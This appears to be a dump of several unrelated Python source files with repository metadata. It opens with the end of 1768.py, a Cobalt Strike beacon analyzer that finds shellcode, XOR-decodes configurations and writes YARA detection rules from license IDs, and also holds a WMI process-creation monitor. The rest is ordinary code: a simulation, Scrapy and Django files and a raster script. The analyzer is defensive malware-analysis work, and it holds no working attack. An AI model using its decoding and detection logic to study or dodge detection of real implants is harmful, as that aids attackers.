else:
bytesToSkip = 0x20
oOutput.Line('Skipping %d bytes' % bytesToSkip)
ProcessBinaryFileSub(sectiondata[bytesToSkip:], data, oOutput, options)
FinalTests(data, options, oOutput)
elif TestShellcodeHeuristic(data):
if IdentifyShellcode(data) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(data, oOutput)
oOutput.Line(cDump(data).HexAsciiDump(rle=False))
FinalTests(data, options, oOutput)
else:
dConfigs = {}
if options.xorkeys:
xorKeys = range(256)
else:
xorKeys = [0x2E, 0x69]
for xorKey in xorKeys:
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(data, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(data[position:position+0x10000], xorKeyBytes), [], options)
configSha256 = hashlib.sha256(''.join(result).encode()).hexdigest()
if not configSha256 in dConfigs:
dConfigs[configSha256] = True
if result != [ERROR_SANITY_CHECK]:
oOutput.JSON(dJSON)
oOutput.Line('xorkey %s %02x' % (xorKeyBytes, xorKey))
for line in result:
oOutput.Line(line)
FinalTests(data, options, oOutput)
# ----------------------------------------------
except:
oLogfile.LineError('Processing file %s %s' % (filename, repr(sys.exc_info()[1])))
if not options.ignoreprocessingerrors:
raise
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def SpaceEvery2Characters(string):
result = []
while string != '':
result.append(string[0:2])
string = string[2:]
return ' '.join(result)
def ProcessLicenseIDs(oOutput, oLogfile, options):
rule_config = '''rule cs_%s_licenseid {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_i = '''rule cs_%s_licenseid_i {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_dot = '''rule cs_%s_licenseid_dot {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_shellcode = '''rule cs_%s_licenseid_shellcode {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00 = '''rule cs_%s_licenseid_shellcode_00 {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00_end = '''rule cs_%s_licenseid_shellcode_00_end {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000 and $a at (filesize - 5)
}
'''
for licenseid in options.licenseids.split(','):
result = licenseid.split(':', 1)
if len(result) == 1:
idInteger = ParseInteger(licenseid)
bytes = struct.pack('>I', idInteger)
idName = binascii.b2a_hex(bytes).decode()
else:
idInteger = ParseInteger(result[1])
bytes = struct.pack('>I', idInteger)
idName = result[0]
prefix = b'\x00\x25\x00\x02\x00\x04'
oOutput.Line(rule_config % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(prefix + bytes).decode())))
oOutput.Line(rule_config_i % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'i')).decode())))
oOutput.Line(rule_config_dot % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'.')).decode())))
oOutput.Line(rule_shellcode % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(bytes).decode())))
oOutput.Line(rule_shellcode_00 % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
oOutput.Line(rule_shellcode_00_end % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
class cOutputJSON(object):
def __init__(self, oOutput, options):
self.oOutput = oOutput
self.options = options
self.messages = []
self.filename = ''
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line, eol='\n'):
if self.options.jsonoutput:
self.messages.append(line)
else:
self.oOutput.Line(line, eol)
def Filename(self, filename, index, total):
self.oOutput.Filename(filename, index, total)
self.filename = filename
class cAPIOptions(object):
def __init__(self):
self.csv = False
self.select = ''
self.ignoreprocessingerrors = False
self.raw = False
self.verbose = False
self.hash = False
self.sanitycheck = False
self.xorkeys = False
class cAPIOutput(object):
def __init__(self):
self.messages = []
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line):
self.messages.append(line)
def LineError(self, line):
pass
def APIAnalyze(data):
oOutput = cAPIOutput()
ProcessBinaryFile('', data, ':', '', oOutput, cAPIOutput(), cAPIOptions())
return oOutput.JSONs
def ProcessBinaryFiles(filenames, oLogfile, options):
oOutput = cOutputJSON(InstantiateCOutput(options), options)
index = 0
if options.jsoninput:
items = CheckJSON(sys.stdin.read())
if items == None:
return
for item in items:
oOutput.Filename(item['name'], index, len(items))
index += 1
ProcessBinaryFile(item['name'], item['content'], '', '', oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
elif options.licenseids != '':
ProcessLicenseIDs(oOutput, oLogfile, options)
else:
for filename, cutexpression, flag in filenames:
oOutput.Filename(filename, index, len(filenames))
index += 1
ProcessBinaryFile(filename, None, cutexpression, flag, oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
def Main():
moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''
oParser = optparse.OptionParser(usage='usage: %prog [options] [[@]file|cut-expression|flag-expression ...]\n' + __description__ + moredesc, version='%prog ' + __version__, epilog='This tool also accepts flag arguments (#f#), read the man page (-m) for more info.')
oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
oParser.add_option('-r', '--raw', action='store_true', default=False, help='Search through the file as a binary file, do not parse as a PE file')
oParser.add_option('-s', '--select', default='', help='Field to select')
oParser.add_option('-S', '--sanitycheck', action='store_true', default=False, help='Exclude configs that do not pass sanity check')
oParser.add_option('-o', '--output', type=str, default='', help='Output to file (# supported)')
oParser.add_option('-l', '--licenseids', default='', help='License ID(s)/Watermark(s) to generate YARA rules for')
oParser.add_option('-c', '--csv', action='store_true', default=False, help='Output config in CSV format')
oParser.add_option('-p', '--password', default='infected', help='The ZIP password to be used (default infected)')
oParser.add_option('-n', '--noextraction', action='store_true', default=False, help='Do not extract from archive file')
oParser.add_option('-H', '--hash', action='store_true', default=False, help='Include hashes of file content')
oParser.add_option('-x', '--xorkeys', action='store_true', default=False, help='Try all single byte XOR keys (not only 0x69 and 0x2e)')
oParser.add_option('--literalfilenames', action='store_true', default=False, help='Do not interpret filenames')
oParser.add_option('--recursedir', action='store_true', default=False, help='Recurse directories (wildcards and here files (@...) allowed)')
oParser.add_option('--checkfilenames', action='store_true', default=False, help='Perform check if files exist prior to file processing')
oParser.add_option('-j', '--jsoninput', action='store_true', default=False, help='Consume JSON from stdin')
oParser.add_option('-J', '--jsonoutput', action='store_true', default=False, help='Output JSON')
oParser.add_option('-V', '--verbose', action='store_true', default=False, help='Verbose output')
oParser.add_option('--logfile', type=str, default='', help='Create logfile with given keyword')
oParser.add_option('--logcomment', type=str, default='', help='A string with comments to be included in the log file')
oParser.add_option('--ignoreprocessingerrors', action='store_true', default=False, help='Ignore errors during file processing')
(options, args) = oParser.parse_args()
if options.man:
oParser.print_help()
PrintManual()
return
if len(args) != 0 and options.jsoninput:
print('Error: option -j can not be used with files')
return
oLogfile = cLogfile(options.logfile, options.logcomment)
oExpandFilenameArguments = cExpandFilenameArguments(args, options.literalfilenames, options.recursedir, options.checkfilenames, '#c#', '#f#')
oLogfile.Line('FilesCount', str(len(oExpandFilenameArguments.Filenames())))
oLogfile.Line('Files', repr(oExpandFilenameArguments.Filenames()))
if oExpandFilenameArguments.warning:
PrintError('\nWarning:')
PrintError(oExpandFilenameArguments.message)
oLogfile.Line('Warning', repr(oExpandFilenameArguments.message))
starttime = time.time()
ProcessBinaryFiles(oExpandFilenameArguments.Filenames(), oLogfile, options)
if options.verbose:
print('Duration: %f' % (time.time() - starttime))
if oLogfile.errors > 0:
PrintError('Number of errors: %d' % oLogfile.errors)
oLogfile.Close()
if __name__ == '__main__':
Main()
| [
"didier.stevens@gmail.com"
] | didier.stevens@gmail.com |
3f39200bc433136f1e88c095425ed4fee9a387cb | e63f9cb17256d0880a3af3241cf41bb894a9014d | /6 objectSwarmObserverAgents_AESOP_turtleLib_NetworkX/oligopoly/oActions.py | 3d05846d5b0c4db8a118fae692484415f2db682c | [
"CC0-1.0"
] | permissive | inknos/SLAPP3 | 2c4e32c7c8592a462d57537472c7150635b60b7c | 56bc323d5e259564961bcfebbcd18069c9bed874 | refs/heads/master | 2020-07-06T10:14:57.030377 | 2019-08-16T15:26:29 | 2019-08-16T15:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,434 | py | from Tools import *
from Agent import *
import time
import csv
import graphicDisplayGlobalVarAndFunctions as gvf
import commonVar as common
import pandas as pd
import parameters as par
import numpy as np
# to eliminate an annoying warning at time 1 in time series plot
import warnings
warnings.filterwarnings("ignore", module="matplotlib")
def do1b(address):
if common.cycle == 1:
# setting Figure for the net
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
f=gvf.plt.figure(num=2)
mngr1 = gvf.plt.get_current_fig_manager() # NB, after figure()
mngr1.window.wm_geometry("+650+0")
mngr1.set_window_title("Links Entrepreneurs - Workers")
# having the map of the agent
agL = []
for ag in address.modelSwarm.agentList:
agL.append(ag.number)
agL.sort()
# print "\noActions before drawGraph agents", agL
# print "oActions before drawGraph nodes", common.g.nodes()
# basic action to visualize the networkX output
gvf.openClearNetworkXdisplay()
gvf.drawGraph()
def do2a(address, cycle):
self = address # if necessary
# ask each agent, without parameters
print("Time = ", cycle, "ask all agents to report position")
askEachAgentInCollection(
address.modelSwarm.getAgentList(),
Agent.reportPosition)
def do2b(address, cycle):
self = address # if necessary
# ask a single agent, without parameters
print("Time = ", cycle, "ask first agent to report position")
if address.modelSwarm.getAgentList() != []:
askAgent(address.modelSwarm.getAgentList()[0],
Agent.reportPosition)
def otherSubSteps(subStep, address):
if subStep == "pause":
input("Hit enter key to continue")
return True
elif subStep == "collectStructuralData":
collectStructuralData(address.modelSwarm.agentList, common.cycle)
return True
elif subStep == "collectTimeSeries":
collectTimeSeries(address.modelSwarm.agentList, common.cycle)
return True
elif subStep == "visualizePlot":
visualizePlot()
return True
elif subStep == "prune":
common.prune = True
newValue = input(("Prune links with weight < %d\n" +
"Enter to confirm " +
"or introduce a new level: ") %
common.pruneThreshold)
if newValue != "":
common.pruneThreshold = int(newValue)
return True
# this subStep performs only partially the "end" item; the execution
# will continue in ObserverSwarm.py
elif subStep == "end":
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
# += and ; as first character because a first part
# of the string toBeExecuted is already defined in
# commonVar.py
common.toBeExecuted += ";gvf.plt.figure(2);gvf.plt.close()"
else:
return False
# collect Structural Data
def collectStructuralData(aL, t):
# creating the dataframe
try:
common.str_df
except BaseException:
common.str_df = pd.DataFrame(columns=['entrepreneurs', 'workers'])
print("\nCreation of fhe structural dataframe\n")
# print common.str_df
nWorkers = 0
nEntrepreneurs = 0
for ag in aL:
if ag.agType == "entrepreneurs":
nEntrepreneurs += 1
if ag.agType == "workers":
nWorkers += 1
# print nEntrepreneurs, nWorkers
str_df2 = pd.DataFrame([[nEntrepreneurs, nWorkers]],
columns=['entrepreneurs', 'workers'])
# print str_df2
common.str_df = common.str_df.append(str_df2, ignore_index=True)
# print common.str_df #warning: here the row index starts from 0
#(correctly in this case, being initial data
# in each period)
# collect time series
def collectTimeSeries(aL, t):
# creating the dataframe
try:
common.ts_df
except BaseException:
common.ts_df = pd.DataFrame(
columns=[
'unemployed',
'totalProfit',
'totalProduction',
'plannedProduction',
'consumptionQ',
#'hPriceSd',
'hPSd',
'price',
'wage'])
print("\nCreation of fhe time series dataframe\n")
# print common.ts_df
unemployed = 0
for ag in aL:
if not ag.employed:
unemployed += 1
# hiding unexisting mean or sd of prices, in the pre-hayekian period
# or in the hayekian one if data are too few
# -100 is used in checkHayekianPrices function of WorldState.py
if common.price == -100: common.price=np.nan
hPSd_=common.hPSd
if common.hPSd==-100: hPSd_=np.nan
# hiding unexisting measure of consumtion in quantity in the pre-hayekian
# phase
if common.totalConsumptionInQuantityInA_TimeStep==0:
common.totalConsumptionInQuantityInA_TimeStep=np.nan
ts_df2 = pd.DataFrame([[unemployed,
common.totalProfit,
common.totalProductionInA_TimeStep,
common.totalPlannedProduction,
common.totalConsumptionInQuantityInA_TimeStep,
hPSd_,
common.price,
common.wage]],
columns=['unemployed',
'totalProfit',
'totalProduction',
'plannedProduction',
'consumptionQ',
'hPSd',
'price',
'wage'])
# print ts_df2
# set previous price (t-1)
common.p0 = common.price
common.ts_df = common.ts_df.append(ts_df2, ignore_index=True)
# print common.ts_df #warning: here the row index starts from 0
# graphical function
def visualizePlot():
# Matplotlib colors
# http://matplotlib.org/api/colors_api.html
# html colors
# http://www.w3schools.com/html/html_colornames.asp
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
f= gvf.plt.figure()
mngr2 = gvf.plt.get_current_fig_manager()
mngr2.window.wm_geometry("+0+0")
mngr2.set_window_title("Time series")
params = {'legend.fontsize': 10}
gvf.plt.rcParams.update(params)
common.axPlot = f.gca()
gvf.plt.ion()
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
common.axPlot.cla()
ts_dfOut = common.ts_df
# set index to start from 1
ts_dfOut.index += 1
myPlot = ts_dfOut.plot(
secondary_y=[
#'hPriceSd',
'price',
'wage'],
marker="*",
color=[
"OrangeRed",
"LawnGreen",
"Blue",
"Violet",
"lightblue",
"Pink",
"Gray",
"Brown"],
ax=common.axPlot)
myPlot.set_ylabel(
'unemployed, totalProfit, totalProduction, plannedProduction, consumptionQ, hPSd')
myPlot.right_ax.set_ylabel('price, wage')
myPlot.legend(loc='upper left')
myPlot.axes.right_ax.legend(loc='lower right')
gvf.plt.pause(0.01)
if common.IPython and not common.graphicStatus == "PythonViaTerminal":
# the and not is about ipython running in a terminal
f2 = gvf.plt.figure()
myax = f2.gca()
# myax.set_autoscale_on(True)
gvf.plt.title('Time Series')
ts_dfOut = common.ts_df
# set index to start from 1
ts_dfOut.index += 1
myPlot = ts_dfOut.plot(
secondary_y=[
#'hPriceSd',
'price',
'wage'],
marker="*",
color=[
"OrangeRed",
"LawnGreen",
"Blue",
"Violet",
"lightblue",
"Pink",
"Gray",
"Brown"],
ax=myax)
myPlot.set_ylabel(
'unemployed, totalProfit, totalProduction, plannedProduction, consumptionQ, hPSd')
myPlot.right_ax.set_ylabel('price, wage')
myPlot.legend(loc='upper left')
myPlot.axes.right_ax.legend(loc='lower right')
#if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
#gvf.plt.figure(1)
# gvf.plt.show()
# gvf.plt.pause(0.01) #to display the sequence
if common.IPython and not common.graphicStatus == "PythonViaTerminal":
# the and not is about ipython running in a terminal
gvf.plt.show()
# saving time data via toBeExecuted in commonVar.py
def saveData():
if common.fgIn!=None: common.fgIn.close()
if common.fgOu!=None: common.fgOu.close()
# used in myGauss.py
# using methodProbs which is a dictionary generated by SLAPP
par.dataFrameAppend("notExisting",\
"from schedule.xls: work trouble probability",
common.methodProbs['workTroubles'])
tt = time.strftime("%Y%m%d_%H-%M-%S")
fileName = tt + "_par.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.par_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_ts.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.ts_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_str.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.str_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_firms.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.firm_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
# the common.modPars_df can be missing
try:
common.modPars_df
fileName = tt + "_modPars.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.modPars_df.to_csv(csvfile, index_label=False, index=False)
print("Five files with date and hour", tt, "written in oligopoly folder.")
except BaseException:
print("Four files with date and hour", tt, "written in oligopoly folder.")
# special action code, to be activated if the time
# (cycle) is equal to ...
#
def makeSpecialAction():
if common.cycle == 1:
files=os.listdir(common.pro)
if "modPars.txt" in files:
common.file_modPars=True
print("The special action has to be activated at cycle ... ")
common.activationCycle = int(input("-1 if never "))
else:
print("\nWarning: no file 'modPars.txt', the specialAction "+\
"item has no effect.\n\n")
if common.file_modPars and common.cycle == common.activationCycle:
print("\n***Special action at time =", common.cycle)
print("***Modification of the following parameters\n")
common.nameValues={}
fIn=open(common.pro+"/modPars.txt","r")
for line in fIn:
line=line.replace('\t',' ')
lineS=line.split() #one or more spaces as a delimiter
n=lineS[0]
if n=="mySeed" or n=="projectVersion" or n=="build" \
or n=="notExisting" or n=="nCycles":
print("Impossible to modify the '"+n+"' parameter in this way.")
print("Program exiting.")
os.sys.exit(1)
try: v=int(lineS[1])
except:
try: v=float(lineS[1])
except: v=lineS[1]
if common.check(n)[0]:
print('existing parameter '+n+', former value',\
common.check(n)[1], ' new value ', v,'\n')
collectModPars(n,common.check(n)[1],v)
else:
print('added parameter '+n+', value ', v,'\n')
collectModPars(n,np.NaN,v)
common.nameValues[n]=v
fIn.close()
common.setVar()
# collect modified parameters
def collectModPars(parName, previousValue, newValue):
# creating the dataframe
try:
common.modPars_df
except BaseException:
common.modPars_df = pd.DataFrame(columns=[\
"Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
print("Creation of the modified parameter database\n")
# print common.modPars_df
# recording the modification cycle
modPars_df2 = pd.DataFrame([\
["NaN","Modifications at time = "+str(common.activationCycle), \
np.NaN, np.NaN]], columns=[\
"Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
common.modPars_df = common.modPars_df.append(modPars_df2, \
ignore_index=True)
# regular data recording
modPars_df2 = pd.DataFrame([[parName, common.parsDict[parName],
previousValue, newValue]],
columns=["Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
common.modPars_df = common.modPars_df.append(modPars_df2, \
ignore_index=True)
#print (common.modPars_df)
| [
"pietro.terna@unito.it"
] | pietro.terna@unito.it |
659c0e4c93ee4769fb51fced1af73af43dd0d449 | 15f953a10339be3accb3240e0a6dc414adaeecbf | /ereading/settings.py | c2096454d1b8b702f0c8beae0ddda8220e5f69c4 | [] | no_license | denolehov/scrapy-ereading | 7a4f9c8b2e66f7a83b4972ff6a7923142ffa95fb | d6be926011831eb90cbd38e39f3321ffed3b55cb | refs/heads/master | 2021-05-28T23:27:26.669462 | 2015-08-29T20:06:16 | 2015-08-29T20:06:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,094 | py | # -*- coding: utf-8 -*-
# Scrapy settings for ereading project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'ereading'
SPIDER_MODULES = ['ereading.spiders']
NEWSPIDER_MODULE = 'ereading.spiders'
ITEM_PIPELINES = {
'ereading.pipelines.BookPipeline': 1,
}
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'ereading (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN=16
# CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
# COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED=False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'ereading.middlewares.MyCustomSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'ereading.middlewares.MyCustomDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'ereading.pipelines.SomePipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
# AUTOTHROTTLE_ENABLED=True
# The initial download delay
# AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED=True
# HTTPCACHE_EXPIRATION_SECS=0
# HTTPCACHE_DIR='httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES=[]
# HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"denolehov@gmail.com"
] | denolehov@gmail.com |
6bc697c7c1415d81c85e98e2b5884c68a98162f5 | 74ec490a69aff693a2142d69ac0fbdbce5f7c8e9 | /rango/migrations/0003_category_likes.py | ea42ed59540bdfaa6cfbf5a79e9f11d6bab5f91b | [] | no_license | Qastel/tango_with_django_project | 1b0210d97ff58d974f9b915b91abe5747b73afca | adb2198d0473455be8cddb744134fcfb3870bdb6 | refs/heads/master | 2020-12-11T16:45:51.776774 | 2020-02-16T14:22:16 | 2020-02-16T14:22:16 | 233,880,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # Generated by Django 2.1.5 on 2020-02-02 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rango', '0002_auto_20200202_1217'),
]
operations = [
migrations.AddField(
model_name='category',
name='likes',
field=models.IntegerField(default=0),
),
]
| [
"constantinrzv@yahoo.com"
] | constantinrzv@yahoo.com |
293d75908a6de5f6498d8ffff4ccfa132ed124cc | 1834f0071e8bfa2c6f4a183517c37d44affe6cd2 | /rasterMM.py | 4dc61d893010a59d9e94af713cb43777f1703eea | [
"MIT"
] | permissive | Bmay531/arcpy-scripts | abdaf1d4ec647f0a388f8bffffe6dcf6fd4eafc5 | 00c4ffadd567eb2cf7d168a166529a86f1a6686c | refs/heads/master | 2020-06-13T06:47:43.288116 | 2014-02-12T17:40:20 | 2014-02-12T17:40:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | # -*- coding: utf-8 -*-
# Program: RASTR.MM
# Version: 1.0
# Objective: To determine the max & min values in a raster dataset
# - BEGIN PROGRAM -
# Ascii art and name
print(
r"""
_____ _____ _______ _____ __ __ __ __
| __ \ /\ / ____|__ __| __ \ | \/ | \/ |
| |__) | / \ | (___ | | | |__) | | \ / | \ / |
| _ / / /\ \ \___ \ | | | _ / | |\/| | |\/| |
| | \ \ / ____ \ ____) | | | | | \ \ _| | | | | | |
|_| \_|_/ \_\_____/ |_| |_| \_(_)_| |_|_| |_|
-._ Developed by: Bilal Karim _.-
"""
)
# Main body of code
import os # Import OS module for later use to load appropriate paths, depending on which system is being used
filePath = raw_input("\n Hello, user. " # Provide info/instructions and ask user to input file path
"RASTR.MM lets you determine the MAX and MIN values of your raster dataset."
"\n \n Please type in the path of your raster file and press 'Enter': ")
x = 0 # Set up a file path validation system
while x < 1:
if os.path.exists(filePath): # If file path exists, continue. Otherwise, go to Line 58
x = 1
rasterFile = open(filePath, "r") # Open the file in read mode
data = rasterFile.readlines()[6:] # Read lines in data except for first 6 lines (i.e., skip header information)
check = True # Validation system for later use to determine max & min values
for lines in data:
content = lines.split() # Split lines of data and assign to a new variable
for dNvalue in content:
dNvalue = int(dNvalue) # Convert strings of DN values from data into integers for max & min evaluation
if check == True:
max = -1 # Validation system for min value (i.e., anything lower than 255)
min = 255 # Validation system for max value (i.e., anything higher than -1)
check = False
else:
if dNvalue > max: # Check to see if the currently read value is greater than max (i.e., -1)..
max = dNvalue # ..and keep continuing until the max value is found from the data
if dNvalue < min: # Check to see if the currently read value is less than min (i.e., 255)..
min = dNvalue # ..and keep continuing until the min value is found from the data
print ("\n Oh, hai there!"), ("\n Your maximum value is"), max, # Display max value to user
print ("\n Your minimum value is"), min # Display min value to user
rasterFile.close() # Close the file
else: # If file path does not exist..
raw_input("\n ** ERROR: File does not exist. Press 'Enter' to continue. ** ") # ..display an error message, and..
filePath = raw_input("\n Please type in the path to your raster file and press 'Enter': ") # ..ask the user to input the file path again
print ("\n RASTR.MM will exit in 5 seconds. \n") # Display exit message for users running this program in Command Prompt/Terminal
import time # Import time module..
time.sleep(5) # ..and exit the program in 5 seconds
# - END PROGRAM -
# What’s the most resilient parasite? Bacteria? A virus? An intestinal worm? An idea. Resilient. Highly contagious.
# Once an idea has taken hold of the brain, it is almost impossible to eradicate. An idea that is fully formed..
# ..fully understood - that sticks; right in there somewhere - Dom Cobb (Inception)
| [
"admin@xeenat.com"
] | admin@xeenat.com |
e1329914d8e28fef90cbe19ac30fa6bd6dfe404f | a6f2b86998c97ae55d527ea3d4cf119bf248d519 | /django/rescrap/admin.py | 4d7f244c0a32058e7fe7f482c797aaf588fafe6d | [] | no_license | lspz/REHub | db57e1bf795cc665073bbd8a9db89706647aa271 | 0123381ba613dcf34fe162860349947a88fdcf07 | refs/heads/master | 2020-12-24T13:36:48.405121 | 2014-07-23T03:53:53 | 2014-07-23T03:53:53 | 22,124,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from django.contrib import admin
from .models import *
admin.site.register(ImportBatch)
admin.site.register(Agency)
admin.site.register(Suburb)
admin.site.register(Address)
admin.site.register(Listing) | [
"louis_parengkuan@yahoo.com"
] | louis_parengkuan@yahoo.com |
7bd76114f2db8c0a333d8012d0d09beaa353a5e9 | 3f480f3501840660235917cdbd0e600a0ac5f10c | /Win32Api/ServiceMonitor.py | 0709057236bb9cc5b714ad691c72041ac1dda694 | [] | no_license | ornitorrincco/Low-Level-Python | a11d72e809e62c2450be315a31f4b3f9427f57c6 | cdd1e69ad1e222c5361c5ca9bd5309484775c8c7 | refs/heads/master | 2020-03-14T13:23:15.718120 | 2019-06-06T04:12:47 | 2019-06-06T04:12:47 | 131,631,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | import win32con
import win32api
import win32security
import wmi
import sys
import os
def logToFile(message):
fd = open('Process Monitor Log.csv','ab')
fd.write(bytes(message, encoding= 'utf-8'))
fd.close()
return
# create a log file header
logToFile('Time, User, Executable, CommandLine, PID, Parent PID, Privileges')
# instantiate the WMI interfaces
c = wmi.WMI()
# create our process Monitor TODO(ornitorrincco): is this a function?
processWatcher = c.Win32_Process.watch_for('creation')
while True:
try:
newProcess = processWatcher()
print(newProcess)
processOwner = newProcess.GetOwner()
print(processOwner)
createDate = newProcess.CreationDate
print(createDate)
executable = newProcess.ExecutablePath
print(executable)
cmdline = newProcess.CommandLine
print(cmdline)
pid = newProcess.ProcessId
print(pid)
parentPid = newProcess.ParentProcessId
print(parentPid)
privileges = 'N/A'
print("%s,%s,%s,%s,%s,%s,%s\r\n" % (create_date, "%s\\%s" % (proc_owner[0],proc_owner[2]), executable, cmdline, pid, parent_pid, privileges))
except:
pass
| [
"ornitorrincco@gmail.com"
] | ornitorrincco@gmail.com |
37f4be96948ac5d8e9f6f8094a2c25c829074819 | 45ee9a6d3ac82043241e96cbf2459e9d3937cd9c | /docs/source/conf.py | b7655eca2423b0fed3ffb8303d889a943a4dc47b | [
"MIT"
] | permissive | ggaughan/django-cities-light | 013f83e870e2f3eaf1ba93e212d83956b8b060a9 | bdd22248c7934d912b8e763360c132da2c794e27 | refs/heads/master | 2021-01-18T00:05:26.502029 | 2013-11-22T20:50:27 | 2013-11-22T20:50:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
#
# django-cities-light documentation build configuration file, created by
# sphinx-quickstart on Sat May 19 19:32:33 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os, sys, os.path
# If extensions (or modules to document with autodoc) are in another directory,
